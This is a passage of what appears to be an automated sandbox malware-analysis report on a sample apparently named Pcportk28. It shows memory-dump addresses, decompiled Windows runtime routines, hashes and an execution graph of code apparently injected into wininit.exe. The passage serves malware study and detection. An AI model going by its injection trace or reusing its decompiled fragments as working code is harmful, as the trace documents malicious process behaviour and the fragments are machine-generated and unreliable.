                                                0x00875372
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x008b2363
                                                0x008b2363
                                                0x008b2369
                                                0x008b236a
                                                0x008b236c
                                                0x008b2371
                                                0x008b2373
                                                0x00000000
                                                0x008b2379
                                                0x008b2379
                                                0x008b237a
                                                0x008b237f
                                                0x008b237f
                                                0x008b2385
                                                0x008b2386
                                                0x008b2389
                                                0x008b238e
                                                0x008b2390
                                                0x00875378
                                                0x0087537c
                                                0x008b2396
                                                0x008b2396
                                                0x008b2397
                                                0x008b239c
                                                0x008b23a2
                                                0x008b23a3
                                                0x008b23a6
                                                0x008b23ab
                                                0x008b23ad
                                                0x00000000
                                                0x008b23b3
                                                0x008b23b3
                                                0x008b23b4
                                                0x008b23b9
                                                0x008b23ba
                                                0x008b23ba
                                                0x008b23bc
                                                0x008b23bf
                                                0x00000000
                                                0x00000000
                                                0x008a9153
                                                0x008a9158
                                                0x008a915a
                                                0x008a915e
                                                0x008a9160
                                                0x00000000
                                                0x008a9166
                                                0x008a9166
                                                0x008a9171
                                                0x008a9176
                                                0x008a9176
                                                0x00000000
                                                0x008a9160
                                                0x008b23c6
                                                0x008b23cb
                                                0x008b23ce
                                                0x008b23d7
                                                0x008b23d7
                                                0x008b23ad
                                                0x008b2390
                                                0x008b2373
                                                0x008b233f
                                                0x008b233f
                                                0x00000000
                                                0x008b233f
                                                0x008b2291
                                                0x008b2291
                                                0x008b2293
                                                0x008b2295
                                                0x008b229a
                                                0x008b22a1
                                                0x008b22a3
                                                0x008b22a7
                                                0x008b22a9
                                                0x00000000
                                                0x00000000
                                                0x008b22ab
                                                0x008b22ad
                                                0x008b22af
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x008b22af
                                                0x008b22b1
                                                0x008b22b4
                                                0x008b22b4
                                                0x008b22b6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x008b22b6
                                                0x008b228f
                                                0x00000000
                                                0x008b226d
                                                0x008753cb
                                                0x008753ce
                                                0x008753d0
                                                0x008753d4
                                                0x008753d6
                                                0x00000000
                                                0x008753d8
                                                0x008753e3
                                                0x008753ea
                                                0x008753ea
                                                0x008753d6
                                                0x00000000

                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008B22F4
                                                Strings
                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 008B22FC
                                                • RTL: Re-Waiting, xrefs: 008B2328
                                                • RTL: Resource at %p, xrefs: 008B230B
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-871070163
                                                • Opcode ID: 5ff10f98bc6c096f4818595e759638e5ae89922874f6ac668563f836c8dedc42
                                                • Instruction ID: 600517cdec4b725ecc61dbbeadc4832de0abeb51c93c90ce8a4aa3d4cbc10385
                                                • Opcode Fuzzy Hash: 5ff10f98bc6c096f4818595e759638e5ae89922874f6ac668563f836c8dedc42
                                                • Instruction Fuzzy Hash: 28512671600A056BEF11AB68CC81FA677D8FF59364F104229FD08DB395EAA5EC4187A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0087EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 51%
                                                			E0087EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E0086DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x93793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E008516C0(_t39);
				} else {
					_t40 = E0084F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E00893915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E008501A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x93793c; // 0x0
								_push(_t85);
								_t44 = L00851F28(_t71);
							} else {
								_t44 = E0084F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E00893915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E008D2306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E0087EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = L00894FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							L008A3F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							L008A3F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x9320c0;
								if(_t85 != 0x9320c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E008D217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							L008A3F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                                0x0087ec56
                                                0x0087ec56
                                                0x0087ec56
                                                0x0087ec5c
                                                0x0087ec64
                                                0x008b23e6
                                                0x008b23eb
                                                0x008b23eb
                                                0x0087ec6a
                                                0x0087ec6c
                                                0x0087ec6f
                                                0x008b23f3
                                                0x008b23f8
                                                0x008b23fa
                                                0x008b23fc
                                                0x0087ec75
                                                0x0087ec76
                                                0x0087ec76
                                                0x0087ec7b
                                                0x0087ec7c
                                                0x0087ec7e
                                                0x008b2406
                                                0x008b2407
                                                0x008b240c
                                                0x008b240d
                                                0x008b240d
                                                0x008b240d
                                                0x008b2414
                                                0x008b2417
                                                0x008b241e
                                                0x008b2435
                                                0x008b2438
                                                0x008b243c
                                                0x008b243f
                                                0x008b2442
                                                0x008b2443
                                                0x008b2446
                                                0x008b2449
                                                0x008b2453
                                                0x008b2455
                                                0x008b245b
                                                0x008b245b
                                                0x0087eb99
                                                0x0087eb99
                                                0x0087eb9c
                                                0x0087eb9d
                                                0x0087eb9f
                                                0x0087eba2
                                                0x008b2465
                                                0x008b246b
                                                0x008b246d
                                                0x0087eba8
                                                0x0087eba9
                                                0x0087eba9
                                                0x0087ebae
                                                0x0087ebb3
                                                0x0087ebb9
                                                0x0087ebbb
                                                0x008b2513
                                                0x008b2514
                                                0x008b2519
                                                0x008b251b
                                                0x0087ec2a
                                                0x0087ec2d
                                                0x0087ec33
                                                0x0087ec36
                                                0x0087ec3a
                                                0x0087ec3e
                                                0x0087ec40
                                                0x0087ec47
                                                0x0087ec47
                                                0x0087ec40
                                                0x008522c6
                                                0x0087ebc1
                                                0x0087ebc1
                                                0x0087ebc5
                                                0x0087ec9a
                                                0x0087ec9a
                                                0x0087ebd6
                                                0x0087ebd6
                                                0x00000000
                                                0x0087ebbb
                                                0x008b2477
                                                0x008b247c
                                                0x008b2486
                                                0x008b248b
                                                0x008b2496
                                                0x008b249b
                                                0x008b249d
                                                0x008b24a0
                                                0x008b24a3
                                                0x008b24aa
                                                0x008b24aa
                                                0x008b24a5
                                                0x008b24a5
                                                0x008b24a5
                                                0x008b24ac
                                                0x008b24af
                                                0x008b24b0
                                                0x008b24b3
                                                0x008b24b9
                                                0x008b24ba
                                                0x008b24bb
                                                0x008b24c6
                                                0x008b24cb
                                                0x008b24cd
                                                0x008b24d0
                                                0x008b24d1
                                                0x008b24d4
                                                0x008b24d6
                                                0x008b24d9
                                                0x008b24d9
                                                0x008b24dc
                                                0x008b24df
                                                0x008b24e1
                                                0x008b24e7
                                                0x008b24e9
                                                0x008b24ec
                                                0x008b24ef
                                                0x008b24f2
                                                0x008b24f2
                                                0x008b24ef
                                                0x008b24e7
                                                0x008b24fa
                                                0x008b24ff
                                                0x008b2501
                                                0x008b2503
                                                0x008b2506
                                                0x008b250b
                                                0x0087eb8c
                                                0x0087eb93
                                                0x00000000
                                                0x00000000
                                                0x0087eb93
                                                0x00000000
                                                0x0087eb99
                                                0x0087ec85
                                                0x0087ec85
                                                0x0087ec85
                                                0x00000000

                                                Strings
                                                • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 008B248D
                                                • RTL: Re-Waiting, xrefs: 008B24FA
                                                • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 008B24BD
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                • API String ID: 0-3177188983
                                                • Opcode ID: 8bfa813e61fb0cfaa50a148e32a00d203cf081eeac4fe5ddd34fdd37d0da5aca
                                                • Instruction ID: 0dc2bc009b5d2f1ac6e333faad7182d170ef8b86663718ee7fd7a4c7d0a7552d
                                                • Opcode Fuzzy Hash: 8bfa813e61fb0cfaa50a148e32a00d203cf081eeac4fe5ddd34fdd37d0da5aca
                                                • Instruction Fuzzy Hash: 6641E870600204ABDB20DFA8DC85FAA7BA8FF49320F208645F559DB7D1D734E9418B66
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0088FCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0088FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = L0088EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = L0088EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E0088685D(_t167, 4) == 0) {
								if(E0088685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E0088685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E0088685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E00868980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							L0085DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = L0088EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = L0088EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

























                                                0x0088fcd1
                                                0x0088fcd6
                                                0x0088fcd9
                                                0x0088fcdc
                                                0x0088fcdf
                                                0x0088fce2
                                                0x0088fce5
                                                0x0088fce8
                                                0x0088fceb
                                                0x0088fced
                                                0x0088fced
                                                0x0088fcf3
                                                0x00000000
                                                0x00000000
                                                0x0088fcfc
                                                0x0088fcfe
                                                0x0088fdc1
                                                0x008becbd
                                                0x00000000
                                                0x008beccc
                                                0x008beccc
                                                0x008becd2
                                                0x00000000
                                                0x00000000
                                                0x008becdf
                                                0x008bece0
                                                0x008bece4
                                                0x008beceb
                                                0x008becee
                                                0x008beca8
                                                0x008beca8
                                                0x008becaa
                                                0x0088fd76
                                                0x0088fd79
                                                0x0088fdb4
                                                0x0088fdb5
                                                0x0088fdb6
                                                0x00000000
                                                0x0088fdb6
                                                0x0088fd7e
                                                0x008becfc
                                                0x0088fe2f
                                                0x00000000
                                                0x0088fe2f
                                                0x008bed08
                                                0x008bed0f
                                                0x008bed17
                                                0x008bed1b
                                                0x00000000
                                                0x008bed1b
                                                0x0088fd88
                                                0x00000000
                                                0x00000000
                                                0x0088fd94
                                                0x0088fd99
                                                0x0088fda1
                                                0x00000000
                                                0x00000000
                                                0x0088fdb0
                                                0x00000000
                                                0x0088fdb0
                                                0x008becbd
                                                0x0088fdc7
                                                0x0088fdcb
                                                0x00000000
                                                0x0088fdd7
                                                0x0088fde3
                                                0x0088fe06
                                                0x008a1fe7
                                                0x00000000
                                                0x00000000
                                                0x008a1fef
                                                0x008a1ff0
                                                0x008a1ff4
                                                0x008a1ff7
                                                0x008a1ffa
                                                0x008a1ffd
                                                0x008a2000
                                                0x00000000
                                                0x00000000
                                                0x008becf1
                                                0x00000000
                                                0x008becf1
                                                0x00000000
                                                0x0088fe06
                                                0x0088fde8
                                                0x0088fdec
                                                0x0088fdef
                                                0x0088fdf2
                                                0x00000000
                                                0x0088fdf2
                                                0x0088fdcb
                                                0x0088fd04
                                                0x0088fd05
                                                0x008bec67
                                                0x00000000
                                                0x00000000
                                                0x008bec6f
                                                0x00000000
                                                0x008bec6f
                                                0x0088fd13
                                                0x0088fd3c
                                                0x0088fd40
                                                0x008bec75
                                                0x008bec7a
                                                0x00000000
                                                0x008bec8a
                                                0x008bec8a
                                                0x008bec90
                                                0x008becb2
                                                0x0088fd73
                                                0x0088fd73
                                                0x00000000
                                                0x0088fd73
                                                0x008bec95
                                                0x00000000
                                                0x00000000
                                                0x008beca1
                                                0x008beca4
                                                0x008beca5
                                                0x00000000
                                                0x008beca5
                                                0x008bec7a
                                                0x0088fd4a
                                                0x00000000
                                                0x0088fd6e
                                                0x0088fd6e
                                                0x0088fd71
                                                0x00000000
                                                0x0088fd71
                                                0x0088fd4a
                                                0x0088fd21
                                                0x0089a3a1
                                                0x00000000
                                                0x0089a3a1
                                                0x0088fd36
                                                0x008a200b
                                                0x008a2012
                                                0x00000000
                                                0x00000000
                                                0x008a2018
                                                0x00000000
                                                0x008a2018
                                                0x00000000
                                                0x0088fd36
                                                0x0088fe0f
                                                0x0088fe16
                                                0x0089a3ad
                                                0x00000000
                                                0x00000000
                                                0x0089a3b3
                                                0x0089a3b3
                                                0x0088fe1f
                                                0x008bed25
                                                0x008bed86
                                                0x00000000
                                                0x00000000
                                                0x008bed91
                                                0x008bed95
                                                0x008bed95
                                                0x008bed9a
                                                0x008bedad
                                                0x008bedb3
                                                0x008bedba
                                                0x008bedc4
                                                0x008bedc9
                                                0x00000000
                                                0x008bedcc
                                                0x008bed2a
                                                0x008bed55
                                                0x00000000
                                                0x00000000
                                                0x008bed61
                                                0x008bed66
                                                0x008bed6e
                                                0x00000000
                                                0x00000000
                                                0x008bed7d
                                                0x00000000
                                                0x008bed7d
                                                0x008bed30
                                                0x00000000
                                                0x00000000
                                                0x008bed3c
                                                0x008bed43
                                                0x008bed4b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: __fassign
                                                • String ID:
                                                • API String ID: 3965848254-0
                                                • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                • Instruction ID: cfac600704774685271467b141e37622a5a52eab989a4f9751c855e79601add1
                                                • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                • Instruction Fuzzy Hash: 15915B31D0020AEFDF24EF98C8456EEB7B4FF95314F24807AD611EA263E7705A558B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Analysis Process: wininit.exe PID: 1760 Parent PID: 1764 wininit.exeCOMMON

                                                Execution Graph

                                                Execution Coverage:2.5%
                                                Dynamic/Decrypted Code Coverage:1.7%
                                                Signature Coverage:0%
                                                Total number of Nodes:693
                                                Total number of Limit Nodes:92

                                                Graph

                                                execution_graph 65103 251f900 LdrInitializeThunk 65106 fd46d 65109 f9c80 65106->65109 65110 f9ca6 65109->65110 65117 e8b60 65110->65117 65112 f9cb2 65113 f9cd6 65112->65113 65125 e7e40 65112->65125 65157 f8930 65113->65157 65119 e8b6d 65117->65119 65160 e8ab0 65117->65160 65120 e8b74 65119->65120 65172 e8a50 65119->65172 65120->65112 65126 e7e67 65125->65126 65585 ea010 65126->65585 65128 e7e79 65589 e9d60 65128->65589 65130 e7e96 65134 e7e9d 65130->65134 65640 e9c90 LdrLoadDll 65130->65640 65133 e7f06 65135 fa270 2 API calls 65133->65135 65154 e7fe4 65133->65154 65134->65154 65593 ed170 65134->65593 65136 e7f1c 65135->65136 65137 fa270 2 API calls 65136->65137 65138 e7f2d 65137->65138 65139 fa270 2 API calls 65138->65139 65140 e7f3e 65139->65140 65605 eaed0 65140->65605 65142 e7f51 65143 f3a50 8 API calls 65142->65143 65144 e7f62 65143->65144 65145 f3a50 8 API calls 65144->65145 65146 e7f73 65145->65146 65147 e7f93 65146->65147 65617 eba40 65146->65617 65149 f3a50 8 API calls 65147->65149 65151 e7fdb 65147->65151 65155 e7faa 65149->65155 65623 e7c70 65151->65623 65154->65113 65155->65151 65642 ebae0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 65155->65642 65158 f894f 65157->65158 65159 f91e0 LdrLoadDll 65157->65159 65159->65158 65161 e8ac3 65160->65161 65211 f6e50 LdrLoadDll 65160->65211 65191 f6d00 65161->65191 65164 e8acc 65165 e8ad6 65164->65165 65194 f9530 65164->65194 65165->65119 65167 e8b13 65167->65165 65205 e88d0 65167->65205 65169 e8b33 65212 e8320 LdrLoadDll 65169->65212 65171 e8b45 65171->65119 65173 e8a6a 65172->65173 65174 f9820 LdrLoadDll 65172->65174 65559 f9820 65173->65559 65174->65173 65177 f9820 LdrLoadDll 65178 e8a91 65177->65178 65179 ecf70 65178->65179 65180 ecf89 65179->65180 65567 e9e90 65180->65567 65182 ecf9c 65571 f8460 65182->65571 65186 ecfc2 65187 ecfed 65186->65187 65578 f84e0 65186->65578 65189 f8710 2 API calls 65187->65189 65190 e8b85 65189->65190 65190->65112 65213 f8880 65191->65213 65195 f9549 65194->65195 65226 f3a50 65195->65226 65197 f956a 65197->65167 65198 f9561 65198->65197 65265 f9370 65198->65265 65200 f957e 65200->65197 65283 f8180 65200->65283 65537 e6e20 65205->65537 65207 e88f1 65207->65169 65208 e88ea 65208->65207 65550 e70e0 65208->65550 65211->65161 65212->65171 65214 f6d15 65213->65214 65216 f91e0 65213->65216 65214->65164 65217 f91f0 65216->65217 65219 f9212 65216->65219 65220 f3e50 65217->65220 65219->65214 65221 f3e5e 65220->65221 65223 f3e6a 65220->65223 65221->65223 65225 f42d0 LdrLoadDll 65221->65225 65223->65219 65224 f3fbc 65224->65219 65225->65224 65227 f3d85 65226->65227 65234 f3a64 65226->65234 65227->65198 65230 f3b73 65351 f86e0 LdrLoadDll 65230->65351 65231 f3b90 65294 f85e0 65231->65294 65234->65227 65291 f7ed0 65234->65291 65235 f3b7d 65235->65198 65236 f3bb7 65237 fa0a0 2 API calls 65236->65237 65238 f3bc3 65237->65238 65238->65235 65239 f3d49 65238->65239 65240 f3d5f 65238->65240 65245 f3c52 65238->65245 65241 f8710 2 API calls 65239->65241 65360 f3790 LdrLoadDll NtReadFile NtClose 65240->65360 65242 f3d50 65241->65242 65242->65198 65244 f3d72 65244->65198 65246 f3cb9 65245->65246 65248 f3c61 65245->65248 65246->65239 65247 f3ccc 65246->65247 65353 f8560 65247->65353 65250 f3c7a 65248->65250 65251 f3c66 65248->65251 65254 f3c7f 65250->65254 65255 f3c97 65250->65255 65352 f3650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 65251->65352 65297 f36f0 65254->65297 65255->65242 65309 f3410 65255->65309 65257 f3c70 65257->65198 65259 f3d2c 65357 f8710 65259->65357 65260 f3c8d 65260->65198 65263 f3caf 65263->65198 65264 f3d38 65264->65198 65266 f9381 65265->65266 65267 f9393 65266->65267 65378 fa020 65266->65378 65267->65200 65269 f93b4 65381 f3060 65269->65381 65271 f9400 65271->65200 65272 f93d7 65272->65271 65273 f3060 3 API calls 65272->65273 65274 f93f9 65273->65274 65274->65271 65413 f4390 65274->65413 65276 f948a 65278 f949a 65276->65278 65507 f9180 LdrLoadDll 65276->65507 65423 f8ff0 65278->65423 65280 f94c8 65502 f8140 65280->65502 65284 f819c 65283->65284 65285 f91e0 LdrLoadDll 65283->65285 65533 251fae8 LdrInitializeThunk 65284->65533 65285->65284 65286 f81b7 65288 fa0a0 65286->65288 65289 f95d9 65288->65289 65534 f88f0 65288->65534 65289->65167 65292 f91e0 LdrLoadDll 65291->65292 65293 f3b44 65291->65293 65292->65293 65293->65230 65293->65231 65293->65235 65295 f85fc NtCreateFile 65294->65295 65296 f91e0 LdrLoadDll 65294->65296 65295->65236 65296->65295 65298 f370c 65297->65298 65299 f8560 LdrLoadDll 65298->65299 65300 f372d 65299->65300 65301 f3748 65300->65301 65302 f3734 65300->65302 65304 f8710 2 API calls 65301->65304 65303 f8710 2 API calls 65302->65303 65305 